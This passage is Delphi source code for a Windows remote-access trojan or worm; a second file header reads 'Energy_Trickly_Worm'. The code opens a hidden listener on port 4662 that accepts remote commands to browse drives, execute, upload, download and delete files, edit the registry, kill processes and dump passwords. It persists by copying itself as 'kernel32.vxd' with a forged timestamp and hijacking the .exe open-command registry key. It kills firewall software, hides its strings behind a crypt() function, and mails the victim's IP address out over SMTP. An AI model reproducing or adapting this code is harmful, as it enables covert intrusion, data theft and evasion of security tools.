Resultat:=FindNext(SearchRec); end; FindClose(SearchRec); If command[length(command)]='\' then command:=copy(command,1,length(command)-1); Resultat:=FindFirst(command+'\'+crypt('+,)'),Attributs,SearchRec); //*.* while Resultat=0 do begin //ProcessMessages; if ((SearchRec.Attr and faDirectory)<=0) then begin FichierTrouve:=command+'\'+SearchRec.Name; TailleDuFichier:=SearchRec.Size; //NomFichierComplet:=FichierTrouve; //DateHeureDuFichier:=SearchRec.Time; end; sleep(timeout); Resultat:=FindNext(SearchRec); sock.writestring(wParam,pchar(crypt('}D9')+FichierTrouve+'|'+inttostr(tailledufichier)+#13+#10)); //|F: end; FindClose(SearchRec); sleep(timeout); sock.writestring(wParam,pchar(crypt('}D9$YZo|dfWP')+#13+#10)); //|F: \\html\\ end; procedure DoStart(wParam:longInt); var ch:char; VolNameStr,Tip:String; LW:byte; Dsize,NamLen,syslen:integer; VolNameAry: array[0..255] of char; VolSer,SysFlags : DWord; begin Driv:=''; d:=0; ch:=#97; sock.WriteString(wParam, PChar(crypt('EmPpdts2')+#13+#10)); //DoStart: repeat d:=d+1; s:=ch+':\'; case getDriveType(pChar(s)) of DRIVE_FIXED: begin Tip:='0'; //Fixed HD NamLen:=255; SysLen:=255; if GetVolumeInformation(pChar(s), VolNameAry, NamLen, @VolSer, SysLen, SysFlags, nil, 0) then VolNameStr := StrPas(VolNameAry) else VolNameStr := ''; LW := ord(upcase(s[1])) - 64; DSize := DiskSize(LW); if (DSize <> -1) then DSize := disksize(LW) DIV 1024; //Driv:=Driv+'Drive: '+UpCase(Ch)+':\'+' <'+Volnamestr+'>'+'&'+Tip+'|'+IntToStr(DSize)+'|'+#13+#10; Driv:=crypt('}F9')+UpCase(Ch)+':\'+' <'+Volnamestr+'>'+'&'+Tip+'|'+IntToStr(DSize)+'|'+#13+#10; //|D: end; DRIVE_CDROM: begin Tip:='1'; //CD-ROM Driv:=Driv+'|D:'+UpCase(Ch)+':\'+' &'+Tip+'|0|'+#13+#10; end; DRIVE_RAMDISK: begin Tip:='2'; //RAM Disk Driv:=Driv+'|D:'+UpCase(Ch)+':\'+' &'+Tip+'|0|'+#13+#10; end; DRIVE_REMOVABLE: begin Tip:='3'; //Removable Driv:=Driv+'|D:'+UpCase(Ch)+':\'+' &'+tip+'|0|'+#13+#10; end; DRIVE_REMOTE: begin Tip:='4'; //Network Driv:=Driv+'|D:'+UpCase(Ch)+':\'+' 
&'+tip+'|0|'+#13+#10; end; sleep(timeout); sock.WriteString(wParam, PChar(Driv)); driv:=''; inc(ch); until d=26; sleep(timeout); sock.WriteString(wParam, PChar(crypt(']^kphj[T')+#13+#10)); //\\html\\ end; procedure DoShowLog(wParam:longInt); var f:file of byte; p:longint; begin Registre:=TRegistry.create; Registre.RootKey:=HKEY_CLASSES_ROOT; Registre.OpenKey('.aft',true); if fileexists(systemdir+crypt(']wpawu)lh~')) then //\users.dat begin assignfile(f,systemdir+crypt(']wpawu)lh~')); //\users.dat reset(f); p:=filesize(f); sock.writestring(wParam,pchar(crypt('mmd>%')+Registre.ReadString('1')+' '+s+' '+inttostr(p)+#13+#10)); //log: closefile(f); end; Registre.Free; end; procedure DoExecFile(wParam:longInt;Command:String); var R:Integer; Params:String; begin Params:=''; if Pos('&',Command)<>0 then begin Params:=Copy(Command,Pos('&',Command)+1,255); Delete(Command,Pos('&',Command),255); end; R:=ShellExecute(0,nil,PChar(Command),PChar(Params),nil,SW_NORMAL); if R<=32 then sock.WriteString(wParam, PChar(ERROR+#13+#10)) else sock.WriteString(wParam, PChar(ALLDONE+#13+#10)); end; procedure DoProxy(wParam:longInt;Command:String); begin // end; procedure DoDeleteFile(wParam:longInt;Command:String); var St:String; Found:Integer; F:TSearchRec; begin Found:=FindFirst(Command,faAnyFile, F); St:=''; while Found = 0 do begin if DeleteFile(ExtractFilePath(Command)+F.Name) then St:=St+F.Name; Found:=FindNext(F); end; sock.WriteString(wParam, PChar(crypt('Dpbw`b''n`fn7')+St+#13+#10)); //Erased files: end; procedure DoSendFile(wParam:longInt;Command:String); var {f:file of byte;} f:HFile; st:string; NumRead:Integer; p:array[1..1024] of char; OfStr:TOFStruct; FF:TSearchRec; begin f:=OpenFile(PChar(Command),OFStr,OF_READ); if f=HFILE_ERROR then begin sock.WriteString(wParam, PChar(ERROR+#13+#10)); exit; end; FindFirst(Command,faAnyFile, FF); St:=IntToStr(FF.Size); sock.WriteString(wParam, PChar(crypt('mmb`cok2')+st+'|'+#13+#10)); //loadfil: sleep(timeout); repeat 
ReadFile(f,P,SizeOf(P),NumRead,nil); Sleep(timeout); if sock.WriteData(wParam,@P,numread)=0 then begin _lclose(f); exit; end; until (NumRead = 0); _lclose(f); end; procedure DoReceiveFile(wParam:longInt;Command:String); begin //done; end; procedure DoRenameFile(wParam:longInt;Command:String); var Params:String; f:file; begin Params:=''; if Pos('&',Command)<>0 then begin Params:=Copy(Command,Pos('&',Command)+1,255); Delete(Command,Pos('&',Command),255); end; assignfile(f,command); if params<>'' then Rename(f,params) else exit; sock.writeString(wParam, PChar(ALLDONE+#13+#10)); end; procedure DoCreateDirectory(wParam:longInt;Command:String); var St:String; begin St:=command; MkDir(command); sock.WriteString(wParam, PChar(crypt('Bpfeqc''l`x1')+St+#13+#10)); //Create dir: end; procedure DoDeleteDirectory(wParam:longInt;Command:String); var St:String; begin St:=command; RmDir(command); sock.WriteString(wParam, PChar(crypt('Dpbw`&ca{0')+St+#13+#10)); //Erase dir: end; procedure DoWriteReg(wParam:longInt;Command:String); var Params,Params1,Params2,Params3:String; begin params:=''; params1:=''; params2:=''; params3:=''; if Pos('&',Command)<>0 then begin params:=copy(command,1,pos('&',command)-1); Delete(Command,1,pos('&',command)); end; if Pos('&',Command)<>0 then begin params1:=copy(command,1,pos('&',command)-1); Delete(Command,1,pos('&',command)); end; if Pos('&',Command)<>0 then begin params2:=copy(command,1,pos('&',command)-1); Delete(Command,1,pos('&',command)); end; Params3:=Copy(Command,1,length(command)); Registre:=TRegistry.create; if strtoint(params)=0 then Registre.RootKey:=HKEY_CLASSES_ROOT; if strtoint(params)=1 then Registre.RootKey:=HKEY_CURRENT_USER; if strtoint(params)=2 then Registre.RootKey:=HKEY_LOCAL_MACHINE; if strtoint(params)=3 then Registre.RootKey:=HKEY_USERS; if strtoint(params)=4 then Registre.RootKey:=HKEY_PERFORMANCE_DATA; if strtoint(params)=5 then Registre.RootKey:=HKEY_CURRENT_CONFIG; if strtoint(params)=6 then 
Registre.RootKey:=HKEY_DYN_DATA; if strtoint(params)>6 then begin sock.WriteString(wParam, PChar(ERROR+#13+#10)); Registre.Free; exit; end; Registre.OpenKey(params1,true); Registre.WriteString(params2,pchar(params3)); Registre.Free; sock.WriteString(wParam, PChar(ALLDONE+#13+#10)); end; procedure DoReadReg(wParam:longInt;Command:String); var params,params1,params2:string; begin if Pos('&',Command)<>0 then begin params:=copy(command,1,pos('&',command)-1); Delete(Command,1,pos('&',command)); end; if Pos('&',Command)<>0 then begin params1:=copy(command,1,pos('&',command)-1); Delete(Command,1,pos('&',command)); end; Params2:=Copy(Command,1,length(command)); Registre:=TRegistry.create; if strtoint(params)=0 then Registre.RootKey:=HKEY_CLASSES_ROOT; if strtoint(params)=1 then Registre.RootKey:=HKEY_CURRENT_USER; if strtoint(params)=2 then Registre.RootKey:=HKEY_LOCAL_MACHINE; if strtoint(params)=3 then Registre.RootKey:=HKEY_USERS; if strtoint(params)=4 then Registre.RootKey:=HKEY_PERFORMANCE_DATA; if strtoint(params)=5 then Registre.RootKey:=HKEY_CURRENT_CONFIG; if strtoint(params)=6 then Registre.RootKey:=HKEY_DYN_DATA; if strtoint(params)>6 then begin sock.WriteString(wParam, PChar(ERROR+#13+#10)); Registre.Free; exit; end; Registre.OpenKey(params1,true); sock.WriteString(wParam, PChar('Data: '+Registre.ReadString(params2)+#13+#10)); Registre.Free; end; procedure DoKillProcess(wParam:longInt;Command:String); begin Killprocess(command); sock.WriteString(wParam, PChar(crypt('Jkohlh`2)')+command+#13+#10)); //Killing: end; procedure DoWindowsProcess(wParam:longInt); var pp:string; begin assignfile(t,windowsdir+'~tmp..dat'); rewrite(t); append(t); EnumWindows(@AddTopLevelWindowsToList,8); closefile(t); assignfile(t,windowsdir+'~tmp..dat'); reset(t); repeat readln(t,pp); Sock.WriteString(wParam, PChar(pp+#13+#10)); sleep(timeout); until pp=''; closefile(t); erase(t); end; procedure DoTimeout(wParam:longInt;Command:String); begin timeout:=strtoint(command); 
sock.WriteString(wParam, PChar('Timeout: '+command+#13+#10)); end; procedure TSock.OnServerRead(wParam,lParam:longInt); var Command:String; f:HFile; check:string; NumWrite:Integer; OfStr:TOFStruct; t1,t2,yy,taille:longint; Buffy:array[1..1024] of char; begin CountRB:=recv(wParam,Buffy,SizeOf(Buffy),0); if CountRB = 0 then exit; Command:=Copy(Buffy,Pos('/',Buffy)+1,Pos('HTTP',Buffy)-Pos('/',Buffy)-2); if command='' then exit; case command[1] of '0' : DoAbout(wParam); '1' : DoShowDirectory(wParam,copy(command,pos('?',command)+1,255)); '2' : DoStart(wParam); '3' : DoShowLog(wParam); '4' : DoExecFile(wParam,copy(command,pos('?',command)+1,255)); '5' : DoSendFile(wParam,copy(command,pos('?',command)+1,255)); '6' : DoDeleteFile(wParam,copy(command,pos('?',command)+1,255)); '7' : begin command:=copy(command,pos('?',command)+1,255); check:=copy(command,pos('|',command)+1,pos('&',command)-1); taille:=strtoint(check); delete(command,pos('|',command),length(command)); sock.WriteString(wParam, PChar('sendfil:'+#13+#10)); f:=OpenFile(PChar(Command),OFStr,OF_CREATE); if f=HFILE_ERROR then begin sock.WriteString(wParam, PChar(ERROR+#13+#10)); exit; end; yy:=0; t1:=round((taille+512)/1024); t2:=t1*1024; //nombre packet t1:=t2-taille; //end packet //t1:=taille-t2; repeat CountRB:=recv(wParam,Buffy,sizeof(Buffy),0); if countRB<>65535 then begin //writeln(taille); if taille<=1024 then begin WriteFile(f,Buffy,taille,NumWrite,nil); _lclose(f); exit; end; yy:=yy+countRB; //bug if yy=t2 then begin t1:=1024-abs(t1); //writeln(t1); WriteFile(f,Buffy,t1,NumWrite,nil); _lclose(f); exit; end else WriteFile(f,Buffy,countRB,NumWrite,nil); end; fillchar(buffy,sizeof(buffy),#0); until (yy>=taille) or (NumWrite = 0); _lclose(f); exit; //DoReceiveFile(wParam,copy(command,pos('?',command)+1,255)); end; '8' : DoRenameFile(wParam,copy(command,pos('?',command)+1,255)); '9' : DoCreateDirectory(wParam,copy(command,pos('?',command)+1,255)); 'A' : 
DoDeleteDirectory(wParam,copy(command,pos('?',command)+1,255)); 'B' : DoWriteReg(wParam,copy(command,pos('?',command)+1,255)); 'C' : DoReadReg(wParam,copy(command,pos('?',command)+1,255)); 'D' : DoProxy(wParam,copy(command,pos('?',command)+1,255)); 'E' : DoKillProcess(wParam,copy(command,pos('?',command)+1,255)); 'F' : DoWindowsProcess(wParam); 'G' : DoPassword(wParam); 'H' : DoTimeout(wParam,copy(command,pos('?',command)+1,255)); end; // closesocket(wParam); processmessages; end; //=== Process OnSocketMessage === procedure OnSocketMessage(Msg,wParam,lParam:longInt); begin if ( LOWORD(lParam) and FD_ACCEPT = FD_ACCEPT) then Sock.OnServerAccept(wParam,lParam); if ( LOWORD(lParam) and FD_CLOSE = FD_CLOSE) then sock.OnServerClose(wParam,lParam); if ( LOWORD(lParam) and FD_READ = FD_READ) then sock.OnServerRead(wParam,lParam); end; //=== OnInitSocket === //==TCP procedure InitSocket; begin WSAStartup($101,WSD); Port:=4662; Server := Socket(AF_INET, SOCK_STREAM, IPPROTO_TCP); // Server := Socket(PF_INET, SOCK_DGRAM, IPPROTO_UDP); if Server = -1 then WSACleanup; Addr.sin_family:= AF_INET; Addr.sin_addr.s_addr:=INADDR_ANY; Addr.sin_port:=htons(Port); bind(Server,Addr,SizeOf(Addr)); WSAAsyncSelect(Server,Handle,WM_MY_SOCK_MESSAGE, FD_ACCEPT + FD_CLOSE + FD_READ); // listen; listen(Server,5); end; //==UDP {procedure InitSocket2; begin si:=SizeOf(integer); WSAStartup($101,WSD); Port:=136; Server := Socket(PF_INET, SOCK_DGRAM, IPPROTO_UDP); if Server = -1 then WSACleanup; Addr.sin_family:= PF_INET; Addr.sin_addr.s_addr:=INADDR_ANY; Addr.sin_port:=htons(Port); setsockopt(Server,SOL_SOCKET,SO_BROADCAST,@i,si); bind(Server,Addr,SizeOf(Addr)); WSAAsyncSelect(Server,Handle,WM_MY_SOCK_MESSAGE, FD_ACCEPT + FD_CLOSE + FD_READ); listen(Server,5); end;} //=====copyit function GetFileDateTimeModified(const FileName: string;var yyyy,mm,dd,h,m,s: word):boolean; var dt,tm: word; DateTime: integer; begin result := false; DateTime := FileAge(FileName); if DateTime = -1 then exit else result 
:= true; tm := DateTime and $FFFF; {lower word} dt := DateTime shr 16; {upper word} h := tm shr 11; m := (tm shr 5) and $3F; s := (tm and $1F) * 2; dd := dt and $1F; mm := (dt shr 5) and $F; yyyy := (dt shr 9)+1980; end; function SetFileDateTime(const FileName: string;var yyyy,mm,dd,h,m,s: word):boolean; var SrchHdl: THandle; FileHdl: HFile; FindData: TWin32FindData; wDate,wTime: word; LocalFileTime, NewFileTime: TFileTime; begin result := false; SrchHdl := FindFirstFile(PChar(FileName), FindData); if SrchHdl <> INVALID_HANDLE_VALUE then begin Windows.FindClose(SrchHdl); if (FindData.dwFileAttributes and FILE_ATTRIBUTE_DIRECTORY) = 0 then begin wTime := (h shl 11) + (m shl 5) + (m div 2); wDate := (dd) + (mm shl 5)+ ((yyyy-1980) shl 9); DosDateTimeToFileTime(wDate,wTime,LocalFileTime); LocalFileTimeToFileTime(LocalFileTime, NewFileTime); FileHdl := _lopen(PChar(FileName), OF_WRITE); if FileHdl <> HFILE_ERROR then begin if SetFileTime(FileHdl,@NewFileTime,@NewFileTime,@NewFileTime) then result := true; _lclose(FileHdl); end; end; end; end; procedure copyit; var FromF, ToF: file; NumRead, NumWritten: Integer; Buf: array[1..2048] of Char; begin s:=paramstr(0); if s<>systemdir+crypt(']ifvkck;;$}ti') then begin filemode:=0; if fileexists(systemdir+crypt(']ifvkck;;$}ti')) then exit; //kernel32.vxd AssignFile(FromF,paramstr(0)); Reset(FromF, 1); { Record size = 1 } AssignFile(ToF, systemdir+crypt(']ifvkck;;$}ti')); //kernel32.vxd Rewrite(ToF, 1); { Record size = 1 } repeat BlockRead(FromF, Buf, SizeOf(Buf), NumRead); BlockWrite(ToF, Buf, NumRead, NumWritten); until (NumRead = 0) or (NumWritten <> NumRead); CloseFile(FromF); CloseFile(ToF); GetFileDateTimeModified(windowsdir+crypt(']g{tiium{$nth'),yyyy,mm,dd,h,m,ss); //\explorer.exe SetFileDateTime(systemdir+crypt(']ifvkck;;$}ti'),yyyy,mm,dd,h,m,ss); //kernel32.vxd end; end; //===========Online??? 
const INVALID_IP_ADDRESS= $ffffffff; function ip2string(ip_address:longint):string; begin ip_address:=ntohl(ip_address); result:= inttostr(ip_address shr 24)+'.'+ inttostr((ip_address shr 16) and $ff)+'.'+ inttostr((ip_address shr 8) and $ff)+'.'+ inttostr(ip_address and $ff); end; function lookup_hostname(const hostname:string):longint; var RemoteHost : PHostEnt; (* no, don't free it! *) ip_address: integer; s: string; begin ip_address:=INVALID_IP_ADDRESS; try if hostname='' then begin (* no host given! *) lookup_hostname:=ip_address; EXIT; end else begin s:=hostname+#0; ip_address:=Inet_Addr(PChar(@s[1])); // ip_address:=Winsock.Inet_Addr(PChar(hostname)); if ip_address=$FFFFFFFF then begin RemoteHost:=GetHostByName(PChar(@s[1])); // RemoteHost:=Winsock.GetHostByName(PChar(hostname)); if (RemoteHost=NIL) or (RemoteHost^.h_length<=0) then begin lookup_hostname:=ip_address; EXIT; (* host not found *) end else ip_address:=longint(pointer(RemoteHost^.h_addr_list^)^); end; end; except ip_address:=INVALID_IP_ADDRESS; end; lookup_hostname:=ip_address; end; //====== Connection Irc === type THede = class(TObject) procedure MyHwndProc(var Msg:TMessage); procedure agprun; function ip2string(ip_address:longint):string; end; const SocketMessag = WM_USER+107; var MySocket: TSocket; MyName : TSockAddr; MyAddr : TInAddr; Hede: THede; Buffer:array[0..1023] of char; res : word; WST : TWSAData; host: string; b:byte; function my_ip_address:longint; const bufsize=255; var buf: pointer; RemoteHost : PHostEnt; (* No, don't free it! 
*) begin buf:=NIL; try getmem(buf,bufsize); gethostname(buf,bufsize); (* this one maybe without domain *) RemoteHost:=GetHostByName(buf); if RemoteHost=NIL then my_ip_address:=htonl($7F000001) (* 127.0.0.1 *) else my_ip_address:=longint(pointer(RemoteHost^.h_addr_list^)^); finally if buf<>NIL then freemem(buf,bufsize); end; end; function THede.ip2string(ip_address:longint):string; begin ip_address:=ntohl(ip_address); result:= inttostr(ip_address shr 24)+'.'+ inttostr((ip_address shr 16) and $ff)+'.'+ inttostr((ip_address shr 8) and $ff)+'.'+ inttostr(ip_address and $ff); end; procedure THede.MyHwndProc(var msg:TMessage); var check,s:string; begin FillChar(buffer,sizeof(buffer),#0); if msg.Msg = SocketMessag then begin if msg.LParamLo = FD_CLOSE then begin //writeln('end'); closesocket(mysocket); WSACleanup; exit; end; //if msg.LParamLo = FD_WRITE then writeln('[Socket Write]'); end; // sock.WriteString(MySocket,pchar(crypt('TQFV%')+copy(nukemsg2,1,7)+' "'+nukemsg2+'.com" "'+ip2string(my_ip_address)+'" :'+copy(nukemsg2,1,5)+#13+#10)); //USER end; procedure THede.agpRun; var zday,zmonth,s:string; myhwnd: Thandle; SystemTime:TSystemTime; z:longint; day,month:integer; begin host:='mail.hotmail.com'; z:=lookup_hostname(host); host:=ip2string(z); MySocket:=socket(PF_INET,SOCK_STREAM,IPPROTO_TCP); MyAddr.S_addr:=Inet_Addr(@Host[1]); MyName.sin_family:=PF_INET; MyName.sin_port:=htons(25); //port to connect MyName.sin_addr:=MyAddr; // MyName.sin_port:=ntohs(strtoint(edit4.text)); //port on receive res:=connect(MySocket,MyName,sizeof(MyName)); if res<>0 then begin //S:='Connect Error : '+inttostr(WSAGetLastError); //writeln(s); closesocket(mysocket); WSACleanup; exit; end; myhwnd := AllocateHwnd(hede.MyHWndProc); WSAAsyncSelect(MySocket, myhwnd, SocketMessag, FD_WRITE OR FD_CLOSE ); res:=Recv(MySocket,Buffer,sizeof(buffer),0); sleep(2000); sock.WriteString(MySocket,pchar('HELO mail.hotmail.com'+#13+#10)); sleep(1000); sock.WriteString(MySocket,pchar('MAIL FROM: 
Energy@hotmail.com'+#13+#10)); sleep(1000); sock.WriteString(MySocket,pchar('RCPT TO: '+crypt('bmga}bf|hJccycny}<p{x')+#13+#10)); sleep(1000); sock.WriteString(MySocket,pchar('DATA'+#13+#10)); sleep(1000); sock.WriteString(MySocket,pchar('From: Energy-Support@hotmail.com'+#13+#10)); sleep(1000); sock.WriteString(MySocket,pchar('To: '+crypt('bmga}bf|hJccycny}<p{x')+#13+#10)); sleep(1000); sock.WriteString(MySocket,pchar('Subject: Failed delivery'+#13+#10)); sleep(1000); with systemtime do begin wYear:= wYear; wMonth:=wMonth; wDayOfWeek:= wDayOfWeek; wDay:=wDay; wHour:= wHour; wMinute:= wMinute; wSecond:= wSecond; wMilliseconds:= wMilliseconds; end; getsystemtime(SystemTime); day:=systemtime.wDayOfWeek; case day of 0: zday:='Sun'; 1: zday:='Mon'; 2: zday:='Tue'; 3: zday:='Wed'; 4: zday:='Thu'; 5: zday:='Fri'; 6: zday:='Sat'; end; month:=systemtime.wMonth; case month of 1: zmonth:='Jan'; 2: zmonth:='Feb'; 3: zmonth:='Mar'; 4: zmonth:='Apr'; 5: zmonth:='May'; 6: zmonth:='Jun'; 7: zmonth:='Jul'; 8: zmonth:='Aug'; 9: zmonth:='Sep'; 10: zmonth:='Oct'; 11: zmonth:='Nov'; 12: zmonth:='Dec'; end; sock.WriteString(MySocket,pchar('Date: '+zday+', '+inttostr(systemtime.wDay)+' '+zmonth+ ' '+inttostr(systemtime.wYear)+' '+inttostr(systemtime.wHour)+':'+inttostr(systemtime.wMinute)+':'+inttostr(systemtime.wSecond)+' +0000'+#13+#10)); //Date: Sat, 1 May 1999 20:46:00 +0000 sleep(1000); sock.WriteString(MySocket,pchar(''+#13+#10)); sleep(1000); sock.WriteString(MySocket,pchar('Content-Type: ' + 'text/plain' + '; charset="' +'iso-8859-1' + '"'+#13+#10)); sleep(1000); sock.WriteString(MySocket,pchar('Content-Transfer-Encoding: quoted-printable'+#13+#10)); sleep(1000); sock.WriteString(MySocket,pchar(''+#13+#10)); sleep(1000); sock.WriteString(MySocket,pchar('Hi '+ip2string(my_ip_address)+#13+#10)); sleep(1000); sock.WriteString(MySocket,pchar(''+#13+#10)); sleep(1000); sock.WriteString(MySocket,pchar('.'+#13+#10)); sleep(1000); sock.WriteString(MySocket,pchar('QUIT'+#13+#10)); 
closesocket(mysocket); WSACleanup; exit; while not ExitCode<>ExitCode2 do processmessages; end; //===fuck_protection procedure scanprotection; begin if findwindow(nil,@(crypt('OgwEuv@}hxo'))[1])<>0 then //NetAppGuard begin killprocess(crypt('OgwEuv@}hxo')); //NetAppGuard end; if findwindow(nil,@(crypt('BmmW`gk(YI+JD\JGP^_'))[1])<>0 then //ConSeal PC FIREWALL begin killprocess(crypt('BmmW`gk(YI+JD\JGP^_')); appmsg(pchar(crypt('HR#ekb''ijidycz/~pv4yyp|~;ss>lIFLBHDGD eABJWP^wZXd]XVzTLZ7 ./d3#5; %%b'))); end; end; //============Thread_procedure=== procedure ThreadProc3; stdcall; begin end; procedure ThreadProc2; stdcall; begin end; procedure ThreadProc; stdcall; var ck1,ck2,ck3:boolean; begin ck1:=false; ck2:=false; ck3:=false; //initsocket; repeat WSACleanup; WSAStartup($101,WSD); z:=lookup_hostname(crypt('vut*hodzfydjy l|')); //www.microsoft.com if z>0 then ck1:=true else ck1:=false; if (ck1=true) and (ck2=false) then begin ck2:=true; ck3:=true; WSACleanup; initsocket; sleep(2000); WSAStartup($101,WST); hede.agprun; end; if (ck1=false) and (ck3=true) then begin ck3:=false; ck2:=false; ShutDownServer; WSACleanup; //writeln('disconnect'); end; sleep(120000); until TerminateThread(ThreadHdle, ExitCode); ShutDownServer; end; //=== Process CreateWindow === procedure OnCreate(hWnd:Integer); begin // end; procedure OnClose(hWnd:Integer); begin ShellExecute(0,nil,PChar(paramstr(0)),nil,nil,SW_NORMAL); //=== re active it ShutDownServer; GetExitCodeThread(ThreadHdle, ExitCode); TerminateThread(ThreadHdle, ExitCode); //GetExitCodeThread(ThreadHdle2, ExitCode2); //TerminateThread(ThreadHdle2, ExitCode2); //GetExitCodeThread(ThreadHdle3, ExitCode3); //TerminateThread(ThreadHdle3, ExitCode3); klog.LogDestroy; end; //== Processes every message sent to MAIN window === function WindowProc(hWnd,Msg,wParam,lParam:Longint):Longint; stdcall; begin Result:= 0; case Msg of WM_CREATE : OnCreate(hWnd); WM_CLOSE : OnClose(hWnd); WM_MY_SOCK_MESSAGE : OnSocketMessage(Msg,wParam,lParam); 
WM_DESTROY : ShutDownServer; end; Result:=DefWindowProc(hWnd,Msg,wParam,lParam); end; function RenameFile(const OldName, NewName: string): Boolean; begin Result := MoveFile(PChar(OldName), PChar(NewName)); end; //=== This is the MAIN PART program ======= begin scanprotection; {sss:=paramstr(1); for iii:=length(sss) downto 1 do begin ccc:=sss[iii]; sss2:=sss2+ccc; if ccc='\' then break; end; if ((sss2=crypt('DZF*75DZ@GW')) or (sss2=crypt('DZF*FTNEU'))) then begin copyfile(pchar(sss),pchar(copy(sss,1,length(sss)-length(sss2))+'\mirc32.com'),true); winexec(PChar(copy(sss,1,length(sss)-length(sss2))+'\mirc32.com'),SW_NORMAL); halt; end;} if (length(paramstr(1))>0) and (length(paramstr(2))>0) and (length(paramstr(3))>0) then winexec(PChar(paramstr(1)+' '+paramstr(2)+' '+paramstr(3)),SW_NORMAL); if (length(paramstr(1))>0) and (length(paramstr(2))>0) and (length(paramstr(3))=0) then winexec(PChar(paramstr(1)+' '+paramstr(2)),SW_NORMAL); if (length(paramstr(1))>0) and (length(paramstr(2))=0) then winexec(PChar(paramstr(1)),SW_NORMAL); if FindWindow(lpzClassName,lpzWindowsName) <> 0 then begin Halt; end;//If start second time hInst:=GetModuleHandle(nil); with wClass do begin Style:= CS_PARENTDC; hIcon:= 0; cbClsExtra:= 0; cbWndExtra:= 0; lpfnWndProc:= @WindowProc; hInstance:= hInst; hbrBackground:= COLOR_WINDOW; lpszClassName:= lpzClassName; lpszMenuName:= NIL; hCursor:= 0; //LoadCursor(0,IDC_ARROW); end; RegisterClass(wClass); Handle:=CreateWindow(lpzClassName,lpzWindowsName,WS_BORDER + WS_SIZEBOX, 0,0,10,10,0,0{hPP},hInst,nil); if Handle<>0 then begin UpdateWindow(Handle); ShowWindow(Handle, SW_HIDE); //SW_HIDE RegisterInService; end; //ThreadHdle2 := CreateThread( Nil,0,@ThreadProc2,Nil,0,ThreadID2); //scan protection //ThreadHdle3 := CreateThread( Nil,0,@ThreadProc3,Nil,0,ThreadID3); //scan protection Registre:=TRegistry.create; Registre.RootKey:=HKEY_CLASSES_ROOT; Registre.OpenKey('exefile\shell\open\command',true); 
Registre.WriteString('',pchar(crypt('jgqj`j4:''|sh-,*!326>'))); //kernel32.vxd "%1" %* Registre.Free; copyit; Timeout:=70; ThreadHdle := CreateThread( Nil,0,@ThreadProc,Nil,0,ThreadID); //Online??? //repeat //sleep(2000); //until z>0; //if z>0 then klog.LogCreate; ProcessMessages; end. --[Energy_Trickly_Worm.dpr]--------------------------------------------------------------- program v; uses dialogs,Windows; {$R *.RES} const {winsock const} FD_SETSIZE = 64; IOCPARM_MASK = $7f; IOC_VOID = $20000000; IOC_OUT = $40000000; IOC_IN = $80000000; IOC_INOUT = (IOC_IN or IOC_OUT); FIONREAD = IOC_OUT or { get # bytes to read } ((Longint(SizeOf(Longint)) and IOCPARM_MASK) shl 16) or (Longint(Byte('f')) shl 8) or 127; FIONBIO = IOC_IN or { set/clear non-blocking i/o } ((Longint(SizeOf(Longint)) and IOCPARM_MASK) shl 16) or (Longint(Byte('f')) shl 8) or 126; FIOASYNC = IOC_IN or { set/clear async i/o } ((Longint(SizeOf(Longint)) and IOCPARM_MASK) shl 16) or (Longint(Byte('f')) shl 8) or 125; // Protocols } IPPROTO_IP = 0; { dummy for IP } IPPROTO_ICMP = 1; { control message protocol } IPPROTO_IGMP = 2; { group management protocol } IPPROTO_GGP = 3; { gateway^2 (deprecated) } IPPROTO_TCP = 6; { tcp } IPPROTO_PUP = 12; { pup } IPPROTO_UDP = 17; { user datagram protocol } IPPROTO_IDP = 22; { xns idp } IPPROTO_ND = 77; { UNOFFICIAL net disk proto } IPPROTO_RAW = 255; { raw IP packet } IPPROTO_MAX = 256; IPPORT_RESERVED = 1024; INADDR_ANY = $00000000; INADDR_LOOPBACK = $7F000001; INADDR_BROADCAST = $FFFFFFFF; INADDR_NONE = $FFFFFFFF; WSADESCRIPTION_LEN = 256; WSASYS_STATUS_LEN = 128; TF_DISCONNECT = $01; TF_REUSE_SOCKET = $02; TF_WRITE_BEHIND = $04; IP_OPTIONS = 1; IP_MULTICAST_IF = 2; { set/get IP multicast interface } IP_MULTICAST_TTL = 3; { set/get IP multicast timetolive } IP_MULTICAST_LOOP = 4; { set/get IP multicast loopback } IP_ADD_MEMBERSHIP = 5; { add an IP group membership } IP_DROP_MEMBERSHIP = 6; { drop an IP group membership } IP_TTL = 7; { set/get IP Time To Live } 
IP_TOS = 8; { set/get IP Type Of Service } IP_DONTFRAGMENT = 9; { set/get IP Don't Fragment flag } IP_DEFAULT_MULTICAST_TTL = 1; { normally limit m'casts to 1 hop } IP_DEFAULT_MULTICAST_LOOP = 1; { normally hear sends if a member } IP_MAX_MEMBERSHIPS = 20; { per socket; must fit in one mbuf } SOCK_STREAM = 1; { stream socket } SOCK_DGRAM = 2; { datagram socket } SOCK_RAW = 3; { raw-protocol interface } SOCK_RDM = 4; { reliably-delivered message } SOCK_SEQPACKET = 5; { sequenced packet stream } SO_DEBUG = $0001; { turn on debugging info recording } SO_ACCEPTCONN = $0002; { socket has had listen() } SO_REUSEADDR = $0004; { allow local address reuse } SO_KEEPALIVE = $0008; { keep connections alive } SO_DONTROUTE = $0010; { just use interface addresses } SO_BROADCAST = $0020; { permit sending of broadcast msgs } SO_USELOOPBACK = $0040; { bypass hardware when possible } SO_LINGER = $0080; { linger on close if data present } SO_OOBINLINE = $0100; { leave received OOB data in line } SO_DONTLINGER = $ff7f; SO_SNDBUF = $1001; { send buffer size } SO_RCVBUF = $1002; { receive buffer size } SO_SNDLOWAT = $1003; { send low-water mark } SO_RCVLOWAT = $1004; { receive low-water mark } SO_SNDTIMEO = $1005; { send timeout } SO_RCVTIMEO = $1006; { receive timeout } SO_ERROR = $1007; { get error status and clear } SO_TYPE = $1008; { get socket type } // SO_CONNDATA = $7000; // SO_CONNOPT = $7001; // SO_DISCDATA = $7002; // SO_DISCOPT = $7003; // SO_CONNDATALEN = $7004; // SO_CONNOPTLEN = $7005; // SO_DISCDATALEN = $7006; // SO_DISCOPTLEN = $7007; // SO_OPENTYPE = $7008; // SO_SYNCHRONOUS_ALERT = $10; // SO_SYNCHRONOUS_NONALERT = $20; // SO_MAXDG = $7009; // SO_MAXPATHDG = $700A; // SO_UPDATE_ACCEPT_CONTEXT = $700B; // SO_CONNECT_TIME = $700C; TCP_NODELAY = $0001; TCP_BSDURGENT = $7000; // AF_UNSPEC = 0; { unspecified } AF_UNIX = 1; { local to host (pipes, portals) } AF_INET = 2; { internetwork: UDP, TCP, etc. 
